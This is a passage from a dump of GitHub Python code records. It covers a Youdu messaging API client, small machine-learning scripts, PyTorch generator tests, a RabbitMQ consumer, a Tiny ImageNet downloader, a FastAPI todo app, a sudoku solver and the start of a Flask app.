:return: (文件名, 字节数大小)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type media_id: unicode or str\n :rtype: (str, int)\n \"\"\"\n check_types(media_id, unicode_str(), str)\n self.__check_and_refresh_token()\n url = _url_with_token(self.__address, API_SEARCHE_FILE, self.__token_info[0])\n return _search_file(self.__buin, self.__app_id, url, self.__crypto, pystr(media_id))\n\n\ndef _url_with_token(address, uri, token):\n \"\"\"\n 生成带Token的url\n :param address: 服务器地址(IP:PORT)\n :param uri: 接口\n :param token: token\n :return: URL\n\n :type address: str\n :type uri: str\n :type token: str\n :rtype: str\n \"\"\"\n return '{scheme}{address}{uri}?accessToken={token}'.format(\n scheme=SCHEME, address=address, uri=uri, token=token)\n\n\ndef _parse_status(rsp):\n\n \"\"\"\n 解析接口错误码\n :param rsp: requests返回的请求结果\n :except HttpRequestError: 失败则抛出异常\n \"\"\"\n if rsp.status_code != requests.codes.OK:\n try:\n rsp.raise_for_status()\n except requests.HTTPError as e:\n raise HttpRequestError(rsp.status_code, 'request failed', e)\n\n\ndef _parse_err(resp_json):\n\n \"\"\"\n 解析错误json信息,如果有错误直接抛出异常\n :param resp_json: 接口返回的json信息\n :except ParamParserError: resp_json不为dict抛出异常\n :except HttpRequestError: 错误码不为0则抛出异常\n \"\"\"\n if not isinstance(resp_json, dict):\n raise ParamParserError('response json is empty')\n\n err_code = resp_json.get('errcode')\n if not isinstance(err_code, int):\n raise ParamParserError('errcode not match type int')\n\n if err_code != 0:\n err_msg = resp_json.get('errmsg', 'no error message')\n raise HttpRequestError(err_code, pystr(err_msg))\n\n\ndef _get_token(buin, app_id, url, crypto_obj):\n \"\"\"\n 获取accessToken\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 请求url\n :param crypto_obj: 加密对象\n :return: (token: accessToken, expire_in: 留存时间,单位:秒)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :rtype: (str, int)\n \"\"\"\n cipher_text = crypto_obj.encrypt(bytestr(str(int(time.time()))))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_text}\n json_result = dict()\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n encrypt_string = json_result.get('encrypt')\n if not is_instance(encrypt_string, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n try:\n token_info = json_loads_utf8(pystr(crypto_obj.decrypt(encrypt_string)))\n token = token_info.get('accessToken')\n expire_in = token_info.get('expireIn')\n if not is_instance(token, unicode_str(), str) and not isinstance(expire_in, int):\n raise ParamParserError('accessToken or expireIn not exists')\n\n return pystr(token), expire_in\n except ValueError as e:\n raise ParamParserError('parse json failed ', e)\n\n\ndef _send_msg(buin, app_id, url, crypto_obj, msg):\n \"\"\"\n 发送消息\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param msg: Message消息对象\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type msg: Message\n \"\"\"\n cipher_text = 
crypto_obj.encrypt(bytestr(msg.to_json_string()))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_text}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n _parse_err(rsp.json())\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n\ndef _upload_file(buin, app_id, url, crypto_obj, file_type, file_name, file_path):\n \"\"\"\n 上传文件\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param file_type: 文件类型\n :param file_name: 文件名称\n :param file_path: 文件路径\n :return: 资源Id\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 读文件错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type file_type: str\n :type file_name: str\n :type file_path: str\n :rtype: str\n \"\"\"\n cipher_request = crypto_obj.encrypt(bytestr(json.dumps({'type': file_type, 'name': file_name})))\n encrypt_file = ''\n try:\n with open(file_path, 'rb') as f:\n encrypt_file = crypto_obj.encrypt(f.read())\n except IOError as e:\n raise FileIOError('failed to read from file {path}'.format(path=file_path), e)\n\n encoder = MultipartEncoder(\n fields={'buin': str(buin),\n 'appId': app_id,\n 'encrypt': cipher_request,\n 'file': ('file', encrypt_file, 'text/plain')}\n )\n\n try:\n rsp = requests.post(url, data=encoder, headers={'Content-Type': encoder.content_type})\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n cipher_id = json_result.get('encrypt')\n if not is_instance(cipher_id, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n media_id = json_loads_utf8(pystr(crypto_obj.decrypt(cipher_id))).get('mediaId', '')\n if not is_instance(media_id, unicode_str(), str):\n raise ParamParserError('result invalid')\n\n return pystr(media_id)\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n\n\ndef _download_file(buin, app_id, url, crypto_obj, media_id, out_dir):\n \"\"\"\n 下载文件\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param media_id: 资源Id\n :param out_dir: 输出文件的目录\n :return: (name: 文件名称, size: 文件大小,单位:字节, content: 文件内容)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n :except FileIOError: 写文件错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type media_id: str\n :type out_dir: str\n :rtype: (str, int, bytes)\n \"\"\"\n cipher_id = crypto_obj.encrypt(bytestr(json.dumps({'mediaId': media_id})))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_id}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = None\n try:\n json_result = rsp.json()\n except ValueError:\n pass # 成功的时候不存在JSON数据\n if json_result is None:\n json_result = {'errcode': 0, 'errmsg': ''}\n _parse_err(json_result)\n cipher_info = rsp.headers.get('encrypt')\n if not is_instance(cipher_info, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n file_info = json_loads_utf8(pystr(crypto_obj.decrypt(cipher_info)))\n file_name = file_info.get('name')\n file_size = file_info.get('size')\n if not is_instance(file_name, unicode_str(), str) and isinstance(file_size, int):\n raise 
ParamParserError('name or size not exists')\n\n file_content = bytestr('')\n with open(abspath(join(out_dir, pystr(file_name))), 'wb') as f:\n file_content = crypto_obj.decrypt(pystr(rsp.content))\n f.write(file_content)\n\n return pystr(file_name), file_size, file_content\n\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n except IOError as e:\n raise FileIOError('failed to save file to {path}'.format(path=out_dir), e)\n\n\ndef _search_file(buin, app_id, url, crypto_obj, media_id):\n \"\"\"\n 搜索文件信息\n :param buin: 企业总机号\n :param app_id: AppId\n :param url: 带token的请求URL\n :param crypto_obj: 加密对象\n :param media_id: 资源Id\n :return: (文件名, 字节数大小)\n :except AESCryptoError: 加密失败\n :except ParamParserError: 参数解析错误\n :except HttpRequestError: http请求错误\n\n :type buin: int\n :type app_id: str\n :type url: str\n :type crypto_obj: AESCrypto\n :type media_id: str\n :rtype: (str, int)\n \"\"\"\n cipher_id = crypto_obj.encrypt(bytestr(json.dumps({'mediaId': media_id})))\n param = {'buin': buin, 'appId': app_id, 'encrypt': cipher_id}\n try:\n rsp = requests.post(url, json=param)\n _parse_status(rsp)\n json_result = rsp.json()\n _parse_err(json_result)\n encrypt_result = json_result.get('encrypt')\n if not is_instance(encrypt_result, unicode_str(), str):\n raise ParamParserError('encrypt content not exists')\n\n file_info = json_loads_utf8(pystr(crypto_obj.decrypt(encrypt_result)))\n name = file_info.get('name', '')\n size = file_info.get('size', 0)\n if name == '' or size <= 0:\n raise ParamParserError('file info is not valid')\n\n return name, size\n except requests.RequestException as e:\n raise HttpRequestError(0, 'connect failed', e)\n except ValueError as e:\n raise ParamParserError('failed to decode json', e)\n","repo_name":"treerootboy/YouduChatGpt","sub_path":"entapp/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":15181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"29711903890","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('Sample_Data2.csv')\r\n\r\nfor column in data.columns:\r\n data[column] = (data[column] - data[column].min()) / (data[column].max() - data[column].min())\r\n\r\n\r\nx = data.iloc[:, 0:2]\r\nones = np.ones((x.shape[0], 1))\r\nx = np.concatenate((ones, x), axis=1)\r\n\r\ny = data.iloc[:, 2:3].values\r\n\r\nweights = np.zeros([1, 3])\r\n\r\nlr = 0.01\r\niters = 1000\r\n\r\n\r\n\r\ndef findloss(x, y, weights):\r\n loss_num = np.power(((x @ weights.T) - y), 2)\r\n return np.sum(loss_num) / (2 * len(x))\r\n\r\n\r\ndef desent(x, y, weights, iters, lr):\r\n loss = np.zeros(iters)\r\n for i in range(iters):\r\n loss[i] = findloss(x, y, weights)\r\n weights = weights - (lr / (len(x))) * np.sum(x * (x @ weights.T - y), axis=0)\r\n\r\n return weights, loss\r\n\r\n\r\nf_weights, loss = desent(x, y, weights, iters, lr)\r\n\r\n\r\nf_loss = findloss(x, y, f_weights)\r\n#print(f_loss)\r\n\r\nk = f_weights.size\r\n\r\ndef create_x_list(k):\r\n for i in range(k):\r\n power = x ** i\r\n return power\r\n\r\n","repo_name":"ThilakBS/AIDEEP","sub_path":"3rdAssingment.py","file_name":"3rdAssingment.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73747495504","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 31 
18:20:00 2017\n\n@author: Alex\n\"\"\"\nimport sys\nimport os\n\nsys.path.append(os.path.join(__file__, os.pardir))\n\nimport pickle\nimport ast\nimport os\nimport qca.flightsched as flight\nimport qca.qcarun as qcarun\nimport pandas\nimport numpy\nimport math\nyear = '2007'\nmonth = '02'\nday = '04'\nresults_folder = os.path.abspath(os.path.join(os.path.join(os.path.join(__file__, os.pardir), os.pardir), 'results'))\nb_vals = [0.0625, 0.125, 0.25, 0.5, 1.0, 2.0]\nlog_bvals = [-4, -3, -2, -1, 0, 1]\nprofile = tuple([22]*4*24)\nfiles = ['results_b' + str(b) + '.out' for b in b_vals]\nseries = {'original', 'uncont', 'cont', 'fixed', 'nomono'}\ntotal_value = {s:[] for s in series}\nsocial_value = {s:[] for s in series}\nnet_value = {s:[] for s in series}\nnum_flights = {s:[] for s in series}\nagg=\"MedAgg\"\nfor f in files:\n with open(os.path.join(os.path.join(results_folder, agg+'_UncontMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n\n origvalue = (\n sum(qcarun.get_schedule_value_without_monopoly(my_results.params.flights, my_results.params).values()))\n total_value['original'].append(origvalue)\n social_value['original'].append(origvalue)\n net_value['original'].append(origvalue)\n num_flights['original'].append(len(my_results.params.flights))\n\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['uncont'].append(nomonovalue+monovalue)\n social_value['uncont'].append(nomonovalue)\n net_value['uncont'].append(nomonovalue+monovalue - payments)\n num_flights['uncont'].append(len(my_results.best_schedule.schedule))\n\n fixedprof_results = qcarun.get_fixed_prof_payments(results=my_results, profile=profile)\n total_value['fixed'].append(fixedprof_results.social_value+fixedprof_results.mono_value)\n social_value['fixed'].append(fixedprof_results.social_value)\n net_value['fixed'].append(fixedprof_results.social_value+fixedprof_results.mono_value- fixedprof_results.payment)\n num_flights['fixed'].append(len(my_results.subaction_results[profile, None].schedule))\n with open(os.path.join(os.path.join(results_folder, agg+'_ContMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['cont'].append(nomonovalue + monovalue)\n social_value['cont'].append(nomonovalue)\n net_value['cont'].append(nomonovalue+monovalue - payments)\n num_flights['cont'].append(len(my_results.best_schedule.schedule))\n with open(os.path.join(os.path.join(results_folder, agg+'_NoMono_VaryBeta_AllSubs2007_02_04'), f),\n 'rb') as my_file:\n my_results: qcarun.AuctionResultStruct = pickle.load(my_file)\n nomonovalue = (sum(\n qcarun.get_schedule_value_without_monopoly(my_results.best_schedule.schedule, my_results.params).values()))\n monovalue = (sum(qcarun.get_schedule_monopoly_value(my_results.best_schedule.schedule, my_results.best_profile,\n 
my_results.params).values()))\n payments = sum(my_results.payments.values())\n total_value['nomono'].append(nomonovalue + monovalue)\n social_value['nomono'].append(nomonovalue)\n net_value['nomono'].append(nomonovalue+monovalue - payments)\n num_flights['nomono'].append(len(my_results.best_schedule.schedule))\nfor myresults, name in zip([total_value, social_value, net_value, num_flights], ['total', 'social', 'net', 'flights']):\n for s, values in myresults.items():\n print(name, s)\n for b,v in zip(log_bvals,values):\n print((b,v))\n print(name+\"_difference\", s)\n for b, v, o_v in zip(log_bvals, values, myresults['original']):\n print((b, v-o_v))\n\n # print(my_results.params)\n","repo_name":"asestes1/qca-ip-sim","sub_path":"test/read_result_values.py","file_name":"read_result_values.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12058157586","text":"from modules.blocks.ReshapeLayer import ReshapeLayer\nfrom modules.normalization.AdaptiveInstanceNormalization import AdaptiveInstanceNormalization\nfrom modules.blocks.ResidualBlock import ResidualBlock\nfrom modules.blocks.DenseBlock import DenseBlock\nfrom modules.blocks.ConvolutionalBlock import ConvolutionalBlock, UpscaleBlock\nfrom modules.blocks.AttentionBlock import AttentionBlock\nfrom modules.blocks.NoiseInput import NoiseInput\n\nimport unittest\nfrom modules.generative.Generator import Generator\nimport torch.nn as nn\nimport torch\n\nclass TestGenerator(unittest.TestCase):\n def setUp(self):\n self.pathgan_generator = Generator()\n self.generator_blocks = self.pathgan_generator.named_children()\n\n self.pathgan_blocks = [\n (\"dense_block_0\", DenseBlock),\n (\"dense_block_1\", DenseBlock),\n (\"reshape_block\", ReshapeLayer),\n (\"res_block_0\", ResidualBlock),\n (\"upscale_block_0\", UpscaleBlock),\n (\"res_block_1\", ResidualBlock),\n (\"upscale_block_1\", UpscaleBlock), \n (\"res_block_2\", ResidualBlock),\n (\"attention_block_2\", AttentionBlock),\n (\"upscale_block_2\", UpscaleBlock), \n (\"res_block_3\", ResidualBlock),\n (\"upscale_block_3\", UpscaleBlock),\n (\"res_block_4\", ResidualBlock),\n (\"upscale_block_4\", UpscaleBlock), \n (\"sigmoid_block\", ConvolutionalBlock)\n ]\n \n self.pathgan_channels = dict({\n \"dense_block_0\" : (200,1024),\n \"dense_block_1\" : (1024,12544),\n \"reshape_block\" : (12544, 256),\n\n \"res_block_0\" : (256,256),\n \"upscale_block_0\" : (256,512),\n \n \"res_block_1\" : (512,512),\n \"upscale_block_1\" : (512,256),\n \n \"res_block_2\" : (256,256),\n \"attention_block_2\" : (256,256),\n \"upscale_block_2\" : (256,128),\n \n \"res_block_3\" : (128,128),\n \"upscale_block_3\" : (128,64),\n \n \"res_block_4\" : (64,64),\n \"upscale_block_4\" : (64,32),\n \n \"sigmoid_block\" : (32,3),\n })\n \n def test_that_number_of_blocks_is_correct(self):\n self.assertEqual(sum(1 for _ in self.generator_blocks), len(self.pathgan_blocks),\n \"Number of blocks should match configuration\")\n \n def test_that_block_order_is_correct(self):\n for generator_block, correct_block in zip(self.generator_blocks, self.pathgan_blocks):\n generator_block_type = type(generator_block[1])\n correct_block_type = correct_block[1]\n self.assertIs(generator_block_type, correct_block_type,\n f\"Type and order of generator blocks should match configuration ({generator_block[0]})\")\n \n def test_that_block_names_are_correct(self):\n for generator_block, correct_block in zip(self.generator_blocks, 
self.pathgan_blocks):\n generator_block_name = generator_block[0]\n correct_block_name = correct_block[0]\n self.assertEqual(generator_block_name, correct_block_name, \n f\"Name of generator blocks should match configuration ({generator_block_name})\")\n \n def test_that_blocks_have_correct_activations(self):\n for block in self.pathgan_generator.named_children():\n if type(block[1]) in (DenseBlock, ConvolutionalBlock) and block[0] != 'sigmoid_block':\n self.assertIs(type(block[1].activation), nn.LeakyReLU)\n \n def test_that_blocks_have_adaptive_instance_normalization(self):\n for block in self.pathgan_generator.children():\n if type(block) in (DenseBlock, UpscaleBlock):\n self.assertTrue(hasattr(block, 'normalization'),\n f\"Dense and convolution blocks should have normalization ({block})\")\n self.assertIs(type(block.normalization), AdaptiveInstanceNormalization,\n f\"Normalization should be AdaIN ({block})\")\n \n if type(block) is ResidualBlock:\n for res_block in block.children():\n self.assertIs(type(res_block.normalization), AdaptiveInstanceNormalization, \n f\"Normalization should be AdaIN ({res_block})\")\n \n def test_that_blocks_have_correct_in_and_out_channels(self):\n for name, block in self.pathgan_generator.named_children():\n block_channels = (block.in_channels, block.out_channels)\n self.assertEqual(block_channels, self.pathgan_channels[name],\n \"Blocks should have correct in_ and out_channels\")\n \n def test_checks_for_valid_output_image_size(self):\n with self.assertRaises(ValueError):\n Generator(synthesis_out_channels = [512, 256, 128, 64, 32], output_shape = (223, 223, 3))\n \n def test_output_shape_is_correct_vanilla_case(self):\n generator = Generator(normalization=None, noise_input=None)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224))\n \n def test_output_shape_is_correct_with_adain(self):\n generator = Generator(normalization=AdaptiveInstanceNormalization, noise_input=None)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224))\n \n def test_output_shape_is_correct_with_noise_input(self):\n generator = Generator(normalization=None, noise_input=NoiseInput)\n data = torch.rand((10, 200))\n latent_in = torch.rand((10, 200))\n output = generator(data, latent_in)\n self.assertEqual(output.shape, (10, 3, 224, 224)) ","repo_name":"theodore-evans/pathgan-pytorch","sub_path":"tests/testGenerator.py","file_name":"testGenerator.py","file_ext":"py","file_size_in_byte":5987,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"42563712534","text":"\n# Check if list contains all of the following elements: 4,8,12,16\n# Create a function that accepts list_of_numbers as an input\n# it should return \"True\" if it contains all, otherwise \"False\"\n\nlist_of_numbers = [2, 4, 6, 8, 10, 12, 14, 16]\n\ndef Checker(NumList=()):\n # all() over the required elements avoids the long chain of \"in\" checks,\n # and the immutable default avoids the mutable-default-argument pitfall\n return all(n in NumList for n in (4, 8, 12, 16))\n\nprint(Checker(list_of_numbers))","repo_name":"green-fox-academy/DonBattery","sub_path":"week-02/day-3/is_in_list.py","file_name":"is_in_list.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43001639074","text":"import pika\n\n# Connect to the RabbitMQ server\ncredentials = 
pika.PlainCredentials('guest', 'guest')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credentials))\n\n# Create a channel and declare the message queue\nchannel = connection.channel()\n\n# Declare the same queue as the producer; if either side goes down, no data is lost\nchannel.queue_declare(queue='desk')\n\n\n# Define the callback that receives messages\ndef callback(channel, method, properties, body):\n print(body)\n\n\n# Tell RabbitMQ to use callback to receive messages\nchannel.basic_consume(on_message_callback=callback, queue='desk', auto_ack=True)\n\n# Start consuming messages\nchannel.start_consuming()\n","repo_name":"mossrs/zjsl","sub_path":"backend/utils/test_rabbitmq/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"30753668341","text":"\"\"\"\nTiny ImageNet 200 dataset.\nCode adapted from\n\"1-Lipschitz Layers Compared: Memory, Speed, and Certifiable Robustness\", 2023.\n\"\"\"\n\nimport os\n\nfrom torchvision.datasets import ImageFolder\n\nDATASET_URL = \"http://cs231n.stanford.edu/tiny-imagenet-200.zip\"\nDATASET_FILENAME = \"tiny-imagenet-200\"\nDATASET_ZIP_FILENAME = \"tiny-imagenet-200.zip\"\nVAL_ANNOTATION_FILENAME = \"val_annotations.txt\"\n\n\nclass TinyImageNet(ImageFolder):\n def __init__(self,\n root: str,\n *args,\n train: bool = True,\n download: bool = True,\n **kwargs\n ):\n\n if download:\n download_and_prepare_tiny_image_net(root)\n\n subfolder = \"train\" if train else \"val\"\n image_folder = os.path.join(root, DATASET_FILENAME, subfolder)\n super().__init__(image_folder, *args, **kwargs)\n\n\ndef download_and_prepare_tiny_image_net(root):\n zip_filename = os.path.join(root, DATASET_ZIP_FILENAME)\n if os.path.exists(zip_filename):\n return\n\n print(\"Downloading Tiny ImageNet 200 dataset...\")\n old_cwd = os.getcwd()\n os.chdir(root)\n os.system(f\"wget -nc {DATASET_URL}\")\n\n print(\"Unzipping Tiny ImageNet 200 dataset...\")\n os.system(f\"unzip -n {DATASET_ZIP_FILENAME}\")\n\n print(\"Moving validation images to sub-folders...\")\n val_dir = os.path.join(DATASET_FILENAME, \"val\")\n val_annotation_filename = os.path.join(val_dir, VAL_ANNOTATION_FILENAME)\n with open(val_annotation_filename) as f:\n for line in f:\n fields = line.split()\n img_filename = fields[0]\n label = fields[1]\n label_dir = os.path.join(val_dir, label)\n os.makedirs(label_dir, exist_ok=True)\n # move image to sub-folder\n os.rename(\n os.path.join(val_dir, \"images\", img_filename),\n os.path.join(label_dir, img_filename),\n )\n\n # Remove empty image folder:\n os.rmdir(os.path.join(val_dir, \"images\"))\n\n print(\"Done.\")\n os.chdir(old_cwd)\n","repo_name":"berndprach/NActivation","sub_path":"src/datasets/tiny_image_net.py","file_name":"tiny_image_net.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"28984366575","text":"from fastapi import FastAPI\nfrom .dataBase.DataBase import engine\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom .routers import authRouter,todoRouter,userRouter\nfrom .models import model\napp = FastAPI()\n\n\n# This creates the models defined in Python in the database when we are not using Alembic\n# Alembic can create the database by using alembic revision --autogenerate\nmodel.Base.metadata.create_all(bind=engine)\n\norigins = [\"*\"]\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n@app.get('/')\ndef root():\n msg = 
'Welcome to the ToDo api made with <3 by nitish'\n return msg\n\napp.include_router(authRouter.router)\napp.include_router(userRouter.router)\napp.include_router(todoRouter.router)\n\n\n","repo_name":"nitish12rm/todo_RestAPI","sub_path":"apps/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"42486592926","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 2 14:29:41 2019\n\n@author: siddharth.m98@gmail.com\n\"\"\"\n# A machine learning model that can help the HR team by detecting a candidate's bluff about the negotiated salary with respect to the years of experience.\n\n# First we need to import 3 libraries for this. These are numpy, matplotlib (if you want to visualize) and pandas\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('../input/Salary_Data.csv')\nX = dataset.iloc[:, 0:1].values # We use this to get the 1st column alone, as it is X\ny = dataset.iloc[:, 1].values # We use this to get the 2nd column alone, which is the one we want to predict, y\n\n# For any regression model, we need to use linear regression to fit our data into the model, so we must import LinearRegression from the sklearn.linear_model module\nfrom sklearn.linear_model import LinearRegression \nlin_reg = LinearRegression()\nlin_reg.fit(X,y)\n\n# Up to now we can use this model for making a linear prediction. But since we want higher accuracy, we use polynomial regression, where powers of the feature enter the model linearly. \n# So we use PolynomialFeatures from the sklearn.preprocessing module for this. Then we transform the current X data to polynomial features using poly_reg.\n\nfrom sklearn.preprocessing import PolynomialFeatures\npoly_reg = PolynomialFeatures(degree = 5) # we use degree 5 here for the best prediction.\nX_poly = poly_reg.fit_transform(X)\n\n# We perform the fitting of our polynomial data here using lin_reg2.\nlin_reg2 = LinearRegression()\nlin_reg2.fit(X_poly,y)\n\n# We can use matplotlib's plt.scatter to visualize the data.\n\nplt.scatter(X,y,color = 'red')\nplt.plot(X,lin_reg.predict(X),color = 'blue')\nplt.title('truth or bluff - linear reg')\nplt.xlabel('Experience level')\nplt.ylabel('salary')\nplt.show()\n\n\n\nplt.scatter(X,y,color = 'red')\nplt.plot(X,lin_reg2.predict(poly_reg.fit_transform(X)),color = 'blue')\nplt.title('truth or bluff - polynomial reg')\nplt.xlabel('Experience level')\nplt.ylabel('salary')\nplt.show()\n\n# Now we can predict any salary by passing years of experience as a parameter.\n\nlin_reg2.predict(poly_reg.fit_transform([[6.5]]))\n","repo_name":"Siddharth1698/Bluff-Detector-using-Polynimial-Regression","sub_path":"bluff_model.py","file_name":"bluff_model.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"29793967720","text":"# Copyright (C) 2010 velociraptor Genjix <aphidia@hotmail.com>\r\n# Copyright (C) 2022 The Qt Company Ltd.\r\n# SPDX-License-Identifier: LicenseRef-Qt-Commercial OR BSD-3-Clause\r\n\r\nimport sys\r\n\r\nfrom PySide6.QtWidgets import QApplication, QPushButton\r\nfrom PySide6.QtStateMachine import QState, QStateMachine\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n button = QPushButton()\r\n machine = QStateMachine()\r\n\r\n closed = QState()\r\n closed.assignProperty(button, 'text', 
'Closed')\r\n closed.setObjectName('closed')\r\n\r\n open = QState()\r\n open.setObjectName('Open')\r\n open.assignProperty(button, 'text', 'Open')\r\n\r\n closed.addTransition(button.clicked, open)\r\n open.addTransition(button.clicked, closed)\r\n\r\n machine.addState(closed)\r\n machine.addState(open)\r\n machine.setInitialState(closed)\r\n machine.start()\r\n button.resize(100, 50)\r\n button.show()\r\n sys.exit(app.exec())","repo_name":"nickfreeborn/rocketry_gui","sub_path":"toggle_test.py","file_name":"toggle_test.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18310957524","text":"class Solution:\n\n def getColValues(self, board, col):\n s = set([board[row][col]\n for row in range(9) if board[row][col] != '.'])\n return s\n\n def getBoxValues(self, board, row, col):\n rbox = 3 * (row // 3)\n cbox = 3 * (col // 3)\n s = set()\n for r in range(rbox, rbox + 3):\n for c in range(cbox, cbox + 3):\n if board[r][c] != '.':\n s.add(board[r][c])\n return s\n\n def solveSudoku(self, board: List[List[str]]) -> None:\n possible_values_set = set([str(i) for i in range(1, 10)])\n self.solveSudokuBT(board, possible_values_set)\n\n def solveSudokuBT(self, board: List[List[str]], possible_values_set: set) -> None:\n for row in range(9):\n rowValues = set(board[row])\n rowValues.discard('.')\n for col in range(9):\n if board[row][col] == '.':\n possibleVals = possible_values_set - rowValues - \\\n self.getColValues(board, col) - \\\n self.getBoxValues(board, row, col)\n if not possibleVals:\n return False\n\n for val in possibleVals:\n board[row][col] = val\n is_valid = self.solveSudokuBT(\n board, possible_values_set)\n if is_valid:\n return True\n board[row][col] = '.'\n return False # nothing is valid\n return True\n","repo_name":"AEstLo/LeetCode","sub_path":"0037_Sudoku_Solver.py","file_name":"0037_Sudoku_Solver.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12461894162","text":"from flask import render_template, flash, redirect, url_for, request, session, send_from_directory, Markup\nfrom app import login, app, db, avatars\nfrom app.forms import ConfirmationRequestForm, LoginForm, RegistrationForm, EditProfileForm, EmptyForm, RecipeForm, ResetPasswordRequestForm, ResetPasswordForm, CropAvatarForm, UploadAvatarForm, CommentForm\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app.models import User, Recipe, Comment, Notification, Vote, RecipeLike\nfrom werkzeug.urls import url_parse\nfrom werkzeug.utils import secure_filename\nfrom datetime import datetime, timedelta\nfrom email_tools import send_password_reset_email, send_confirmation_email\nfrom sqlalchemy import and_, or_, func, case\nimport os, timeago, sys\nfrom random import randint\nfrom PIL import Image\n\n@login.user_loader\ndef load_user(id):\n return 